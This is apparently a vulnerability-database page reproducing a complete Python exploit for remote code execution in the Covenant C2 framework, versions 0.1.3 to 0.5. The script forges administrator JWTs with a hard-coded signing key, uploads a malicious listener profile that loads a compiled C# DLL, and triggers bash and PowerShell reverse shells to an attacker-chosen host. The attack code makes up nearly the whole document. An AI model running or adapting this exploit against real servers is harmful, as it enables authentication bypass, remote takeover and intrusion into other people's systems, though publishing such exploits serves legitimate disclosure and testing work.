Lucene search
K

Covenant 0.5 Remote Code Execution

🗓️ 30 Mar 2023 00:00:00 · Reported by xThaz · Type
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 418 Views

Covenant v0.5 Remote Code Execution

Code
`# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)  
# Exploit Author: xThaz  
# Author website: https://xthaz.fr/  
# Date: 2022-09-11  
# Vendor Homepage: https://cobbr.io/Covenant.html  
# Software Link: https://github.com/cobbr/Covenant  
# Version: v0.1.3 - v0.5  
# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker  
  
# Vulnerability  
## Discoverer: coastal  
## Date: 2020-07-13  
## Discoverer website: https://blog.null.farm  
## References:  
## - https://blog.null.farm/hunting-the-hunters  
## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb  
  
#!/usr/bin/env python3
# encoding: utf-8  
  
  
import jwt # pip3 install PyJWT  
import json  
import warnings  
import base64  
import re  
import random  
import argparse  
  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
from Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodome  
from Crypto.Util.Padding import pad  
from Crypto.Cipher import AES  
from requests import request # pip3 install requests  
from subprocess import run  
from pwn import remote, context # pip3 install pwntools  
from os import remove, urandom  
from shutil import which  
from urllib.parse import urlparse  
from pathlib import Path  
from time import time  
  
  
def check_requirements():
    """Ensure the ``mcs`` compiler is reachable on PATH.

    Returns ``None`` when ``mcs`` is found. Otherwise prints installation
    hints and terminates the interpreter with exit status -1.
    """
    if which("mcs") is not None:
        return

    for hint in (
        "Please install the mono framework in order to compile the payload.",
        "https://www.mono-project.com/download/stable/",
    ):
        print(hint)
    exit(-1)
  
  
def random_hex(length):
    """Return ``length`` random lowercase hexadecimal digits as one string.

    Each digit is drawn independently with ``random.choice``; a length of
    zero produces the empty string.
    """
    hex_digits = "0123456789abcdef"
    picked = []
    for _ in range(length):
        picked.append(random.choice(hex_digits))
    return ''.join(picked)
  
  
def request_api(method, token, route, body=""):
    """Send a bearer-authenticated JSON request to ``<args.target>/api/<route>``.

    Args:
        method: HTTP verb passed straight to ``requests.request``.
        token: JWT placed in the ``Authorization: Bearer`` header.
        route: Path appended after ``/api/``.
        body: Object sent through the ``json=`` argument (default ``""``).

    Returns:
        The response object returned by ``requests.request``.

    Certificate verification is turned off and the matching
    ``InsecureRequestWarning`` is silenced on every call. Reads the
    module-level ``args`` namespace for the target URL.
    """
    warnings.simplefilter('ignore', InsecureRequestWarning)

    url = f"{args.target}/api/{route}"
    auth_headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    return request(method, url, json=body, headers=auth_headers, verify=False)
  
  
def craft_jwt(username, userid=None):
    """Build an HS256-signed JWT for ``username`` with User and Administrator roles.

    Args:
        username: Value stored in the ``sub`` claim.
        userid: Value stored in the ``nameidentifier`` claim. When omitted, a
            fresh random GUID-shaped id (8-4-4-4-12 hex digits) is generated
            for this call.

    Returns:
        The encoded token as returned by ``jwt.encode``.

    The token is signed with the hard-coded key below, carries issuer and
    audience ``"Covenant"``, and expires 360 seconds after creation.
    """
    # A default written as an f-string in the signature is evaluated only once,
    # when the function is defined, so every call would share the same id.
    # Generating it here yields a new id per call.
    if userid is None:
        userid = f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"

    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'

    payload_data = {
        "sub": username,
        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
            "User",
            "Administrator"
        ],
        "exp": int(time()) + 360,
        "iss": "Covenant",
        "aud": "Covenant"
    }

    token = jwt.encode(payload_data, secret_key, algorithm='HS256')
    return token
  
  
def get_id_admin(token, json_roles):
    """Look up the user name and user id of an account holding the Administrator role.

    Args:
        token: JWT used for the ``users/roles`` and ``users`` API requests.
        json_roles: Iterable of role dicts, each with ``"name"`` and ``"id"``.

    Returns:
        A ``(username_admin, id_admin_user)`` tuple.

    The lookup runs in three steps (role id, then user id, then user name).
    The first match wins at each step; if a step finds nothing, a message is
    printed and the interpreter exits with status -1.
    """
    # Private sentinel so that a legitimately falsy/None id is not mistaken
    # for "no match".
    missing = object()

    id_admin = next(
        (role["id"] for role in json_roles if role["name"] == "Administrator"),
        missing,
    )
    if id_admin is missing:
        print("\t[!] Did not found admin group id, quitting !")
        exit(-1)
    print(f"\t[*] Found the admin group id : {id_admin}")

    json_users_roles = request_api("get", token, "users/roles").json()
    id_admin_user = next(
        (link["userId"] for link in json_users_roles if link["roleId"] == id_admin),
        missing,
    )
    if id_admin_user is missing:
        print("\t[!] Did not found admin id, quitting !")
        exit(-1)
    print(f"\t[*] Found the admin user id : {id_admin_user}")

    json_users = request_api("get", token, "users").json()
    username_admin = next(
        (account["userName"] for account in json_users if account["id"] == id_admin_user),
        missing,
    )
    if username_admin is missing:
        print("\t[!] Did not found admin username, quitting !")
        exit(-1)
    print(f"\t[*] Found the admin username : {username_admin}")
    return username_admin, id_admin_user
  
  
def compile_payload():
    """Compile the C# payload class with ``mcs`` and return the DLL as base64 text.

    The process-start arguments are chosen from ``args.os`` and embed
    ``args.lhost`` / ``args.lport`` (module-level ``args``). The generated
    source is written to ``/tmp/<random>.cs`` and compiled with
    ``mcs -t:library``. The resulting ``.dll`` is read and base64-encoded,
    and both temporary files are removed.

    Returns:
        The base64-encoded DLL as ``str``.

    Exits with status -1 when the compiler returns a non-zero code.
    """
    if args.os != "windows":
        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'
    else:
        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'

    source_head = """using System;
using System.Reflection;

namespace ExampleDLL{
public class Class1{
public Class1(){
}

public void Main(string[] args){
System.Diagnostics.Process.Start("""
    source_tail = """);
}
}
}
"""
    dll = source_head + payload + source_tail

    temp_dll_path = f"/tmp/{random_hex(8)}"
    source_file = f"{temp_dll_path}.cs"
    library_file = f"{temp_dll_path}.dll"

    Path(source_file).write_bytes(dll.encode())
    print(f"\t[*] Writing payload in {temp_dll_path}.cs")

    compilation = run([which("mcs"), source_file, "-t:library"])
    if compilation.returncode:
        print("\t[!] Error when compiling DLL, quitting !")
        exit(-1)
    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")

    dll_encoded = base64.b64encode(Path(library_file).read_bytes()).decode()

    for leftover in (source_file, library_file):
        remove(leftover)
    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
    return dll_encoded
  
  
def generate_wrapper(dll_encoded):
    """Return the C# ``MessageTransform`` source with ``dll_encoded`` embedded.

    Args:
        dll_encoded: Base64 text placed inside the ``assemblyBase64`` string
            literal of the generated class.

    Returns:
        The complete C# source as ``str``. Its ``Transform`` method loads the
        embedded assembly and invokes ``Main`` on every type, swallowing
        errors, before base64-encoding its input. ``Invert`` base64-decodes.
    """
    prologue = '''public static class MessageTransform {
public static string Transform(byte[] bytes) {
try {
string assemblyBase64 = "'''
    epilogue = '''";
var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
var assembly = System.Reflection.Assembly.Load(assemblyBytes);
foreach (var type in assembly.GetTypes()) {
object instance = System.Activator.CreateInstance(type);
object[] args = new object[] { new string[] { "" } };
try {
type.GetMethod("Main").Invoke(instance, args);
}
catch {}
}
}
catch {}
return System.Convert.ToBase64String(bytes);
}

public static byte[] Invert(string str) {
return System.Convert.FromBase64String(str);
}
}'''

    return "".join((prologue, dll_encoded, epilogue))
  
  
def upload_profile(token, wrapper):
    """Create an HTTP listener profile whose ``messageTransform`` is ``wrapper``.

    Args:
        token: JWT used to authenticate the ``profiles/http`` POST.
        wrapper: C# source stored in the profile's ``messageTransform`` field.

    Returns:
        The ``id`` field of the JSON response (``None`` if absent).

    Exits with status -1 when the API response is not OK.
    """
    user_agent = (
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
        'Safari/537.36'
    )
    request_headers = [
        {'name': 'User-Agent', 'value': user_agent},
        {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'},
    ]
    response_headers = [
        {'name': 'Server', 'value': 'Microsoft-IIS/7.5'},
    ]

    body = {
        'httpUrls': ['/en-us/index.html', '/en-us/docs.html', '/en-us/test.html'],
        'httpRequestHeaders': request_headers,
        'httpResponseHeaders': response_headers,
        'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
        'httpGetResponse': '{DATA}',
        'httpPostResponse': '{DATA}',
        'id': 0,
        'name': random_hex(8),
        'description': '',
        'type': 'HTTP',
        'messageTransform': wrapper,
    }

    response = request_api("post", token, "profiles/http", body)

    if response.ok:
        profile_id = response.json().get('id')
        print(f"\t[*] Profile created with id {profile_id}")
        print("\t[*] Successfully created the listener profile")
        return profile_id

    print("\t[!] Failed to create the listener profile, quitting !")
    exit(-1)
  
  
def generate_valid_listener_port(impersonate_token, tries=0):
    """Pick a random port in 8000-8250 that no existing listener is bound to.

    Args:
        impersonate_token: JWT used to query the ``listeners`` API route.
        tries: Number of attempts already consumed; at most ``10 - tries``
            further attempts are made.

    Returns:
        The chosen port number (``int``).

    Exits with status -1 once ten attempts have been used without finding a
    free port.

    The previous recursive version discarded the result of its retry call,
    so any run that hit an occupied port on the first draw returned ``None``.
    A bounded loop makes every successful attempt return the port.
    """
    for _ in range(tries, 10):
        port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT
        # Re-query on each attempt, as the original did on each recursion.
        listeners = request_api("get", impersonate_token, "listeners").json()
        ports_in_use = {listener["bindPort"] for listener in listeners}

        if port not in ports_in_use:
            print(f"\t[*] Port {port} seems free")
            return port

        print(f"\t[!] Port {port} is already taken by another listener, retrying !")

    print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
    exit(-1)
  
  
def get_id_listener_type(impersonate_token, listener_name):
    """Return the id of the listener type named ``listener_name``.

    Args:
        impersonate_token: JWT used to query ``listeners/types``.
        listener_name: Value compared against each entry's ``"name"``.

    Returns:
        The ``"id"`` of the first matching entry, or ``None`` when no entry
        matches.

    Exits with status -1 when the API response is not OK.
    """
    response = request_api("get", impersonate_token, "listeners/types")
    if not response.ok:
        print("\t[!] Failed to get the listener type, quitting !")
        exit(-1)

    candidates = (entry for entry in response.json() if entry["name"] == listener_name)
    match = next(candidates, None)
    if match is None:
        return None

    type_id = match["id"]
    print(f'\t[*] Found id {type_id} for listener {listener_name}')
    return type_id
  
  
def generate_listener(impersonate_token, profile_id):
    """Create an active HTTP listener bound to 0.0.0.0 that uses ``profile_id``.

    Args:
        impersonate_token: JWT used for all API requests made here.
        profile_id: Id of the listener profile to attach.

    Returns:
        A ``(listener_id, listener_port)`` tuple, where ``listener_id`` is the
        ``id`` field of the JSON response.

    Exits with status -1 when the ``listeners/http`` POST is not OK.
    """
    any_address = "0.0.0.0"

    listener_port = generate_valid_listener_port(impersonate_token)
    listener_name = random_hex(8)
    http_type_id = get_id_listener_type(impersonate_token, "HTTP")

    data = {
        'useSSL': False,
        'urls': [f"http://0.0.0.0:{listener_port}"],
        'id': 0,
        'name': listener_name,
        'bindAddress': any_address,
        'bindPort': listener_port,
        'connectAddresses': [any_address],
        'connectPort': listener_port,
        'profileId': profile_id,
        'listenerTypeId': http_type_id,
        'status': 'Active',
    }

    response = request_api("post", impersonate_token, "listeners/http", data)

    if response.ok:
        print("\t[*] Successfully created the listener")
        return response.json().get("id"), listener_port

    print("\t[!] Failed to create the listener, quitting !")
    exit(-1)
  
  
def create_grunt(impersonate_token, data):
    """Request a binary launcher and return its ``stagerCode``.

    Args:
        impersonate_token: JWT used for the ``launchers/binary`` requests.
        data: Launcher configuration sent as the JSON body.

    Returns:
        The non-empty ``stagerCode`` string from the API response.

    A PUT is tried first. A POST is issued only if the PUT answered with an
    empty ``stagerCode``. If both are empty, the interpreter exits with
    status -1.
    """
    for verb in ("put", "post"):
        reply = request_api(verb, impersonate_token, "launchers/binary", data).json()
        stager_code = reply["stagerCode"]
        if stager_code != "":
            print("\t[*] Successfully created the grunt payload")
            return stager_code

    print("\t[!] Failed to create the grunt payload, quitting !")
    exit(-1)
  
  
def get_grunt_config(impersonate_token, listener_id):
    """Generate a binary launcher for ``listener_id`` and extract its key and GUID prefix.

    Args:
        impersonate_token: JWT forwarded to ``create_grunt``.
        listener_id: Listener the launcher is attached to.

    Returns:
        An ``(aes_key, guid_prefix)`` tuple of strings captured from the
        returned stager code by the two regular expressions below.

    Exits with status -1 when either pattern fails to match.
    """
    launcher_settings = {
        'id': 0,
        'listenerId': listener_id,
        'implantTemplateId': 1,
        'name': 'Binary',
        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
        'type': 'binary',
        'dotNetVersion': 'Net35',
        'runtimeIdentifier': 'win_x64',
        'validateCert': True,
        'useCertPinning': True,
        'smbPipeName': 'string',
        'delay': 0,
        'jitterPercent': 0,
        'connectAttempts': 0,
        'launcherString': 'GruntHTTP.exe',
        'outputKind': 'consoleApplication',
        'compressStager': False,
    }

    stager_code = create_grunt(impersonate_token, launcher_settings)

    key_match = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
    guid_match = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
    if not (key_match and guid_match):
        print("\t[!] Failed to retrieve the grunt configuration, quitting !")
        exit(-1)

    aes_key, guid_prefix = key_match.group(1), guid_match.group(1)
    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
    return aes_key, guid_prefix
  
  
def aes256_cbc_encrypt(key, message):
    """Encrypt ``message`` with AES-CBC and compute an HMAC-SHA256 over the ciphertext.

    Args:
        key: Base64-encoded key; the decoded bytes are used for both the
            cipher and the HMAC.
        message: Text to encrypt; it is encoded and padded to a 16-byte
            block size before encryption.

    Returns:
        An ``(encrypted, iv_bytes, signature)`` tuple of ``bytes``. The IV is
        16 fresh bytes from ``os.urandom``.
    """
    iv_bytes = urandom(16)
    raw_key = base64.b64decode(key)
    plaintext_blocks = pad(message.encode(), 16)

    encrypted = AES.new(raw_key, AES.MODE_CBC, iv_bytes).encrypt(plaintext_blocks)

    mac = HMAC.new(raw_key, digestmod=SHA256)
    mac.update(encrypted)
    signature = mac.digest()

    return encrypted, iv_bytes, signature
  
  
def trigger_exploit(listener_port, aes_key, guid):
    """Build the encrypted POST body and deliver it to the listener.

    Args:
        listener_port: Port of the listener to contact.
        aes_key: Base64 key handed to ``aes256_cbc_encrypt``.
        guid: Value used for the ``GUID`` field and the session cookie.

    The fixed RSA public-key XML is encrypted, wrapped in a JSON envelope
    (GUID, Type, Meta, IV, EncryptedMessage, HMAC), URL-safe base64-encoded
    and placed in the ``data=`` form field. Delivery is attempted with a
    ``Cookie`` header first and, if that fails, once more with ``Cookies``.
    Only status messages are printed; nothing is returned.
    """
    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"

    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
    envelope = {
        "GUID": guid,
        "Type": 0,
        "Meta": '',
        "IV": base64.b64encode(iv).decode(),
        "EncryptedMessage": base64.b64encode(ciphered).decode(),
        "HMAC": base64.b64encode(signature).decode(),
    }

    encoded_envelope = base64.urlsafe_b64encode(json.dumps(envelope).encode("utf-8")).decode()
    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={encoded_envelope}&session=75db-99b1-25fe4e9afbe58696-320bea73"

    if send_exploit(listener_port, "Cookie", guid, payload):
        print("\t[*] Exploit succeeded, check listener")
        return

    print("\t[!] Exploit failed, retrying")
    if send_exploit(listener_port, "Cookies", guid, payload):
        print("\t[*] Exploit succeeded, check listener")
        return

    print("\t[!] Exploit failed, quitting")
  
  
def send_exploit(listener_port, header_cookie, guid, payload):
    """Send one raw HTTP POST to the listener and report whether it answered 200.

    Args:
        listener_port: TCP port to connect to on ``IP_TARGET``.
        header_cookie: Name of the header that carries the session cookie.
        guid: Value placed in the ``ASPSESSIONID`` cookie.
        payload: Form-encoded request body.

    Returns:
        ``True`` if the first chunk received contains ``"HTTP/1.1 200 OK"``,
        otherwise ``False``.

    Reads the module-level ``IP_TARGET``. The connection is now closed in a
    ``finally`` clause so it is released even when receiving or decoding the
    reply raises.
    """
    context.log_level = 'error'

    # Named ``raw_request`` so the imported ``requests.request`` function is
    # not shadowed inside this function.
    raw_request = f"""POST /en-us/test.html HTTP/1.1\r
Host: {IP_TARGET}:{listener_port}\r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: {len(payload)}\r
\r
{payload}
""".encode()

    sock = remote(IP_TARGET, listener_port)
    try:
        sock.sendline(raw_request)
        response = sock.recv().decode()
    finally:
        sock.close()

    return "HTTP/1.1 200 OK" in response
  
if __name__ == "__main__":
    # Script entry point. ``args`` and ``IP_TARGET`` are deliberately left as
    # module-level names because request_api, compile_payload and send_exploit
    # read them as globals.
    check_requirements()

    cli = argparse.ArgumentParser()
    cli.add_argument(
        "target",
        help="URL where the Covenant is hosted, example : https://127.0.0.1:7443",
    )
    cli.add_argument(
        "os",
        choices=["windows", "linux"],
        help="Operating System of the target",
    )
    cli.add_argument(
        "lhost",
        help="IP of the machine that will receive the reverse shell",
    )
    cli.add_argument(
        "lport",
        help="Port of the machine that will receive the reverse shell",
    )
    args = cli.parse_args()

    IP_TARGET = urlparse(args.target).hostname

    # Step 1: use a throwaway token to find an administrator account, then
    # craft a second token for that account.
    print("[*] Getting the admin info")
    sacrificial_token = craft_jwt("xThaz")
    roles = request_api("get", sacrificial_token, "roles").json()
    admin_username, admin_id = get_id_admin(sacrificial_token, roles)
    impersonate_token = craft_jwt(admin_username, admin_id)
    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")

    # Step 2: build the payload and wrap it in the message-transform source.
    print("[*] Generating payload")
    wrapper = generate_wrapper(compile_payload())

    # Step 3: register the profile and a listener that uses it.
    print("[*] Uploading malicious listener profile")
    profile_id = upload_profile(impersonate_token, wrapper)

    print("[*] Generating listener")
    listener_id, listener_port = generate_listener(impersonate_token, profile_id)

    # Step 4: fetch the launcher parameters and contact the listener.
    print("[*] Triggering the exploit")
    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation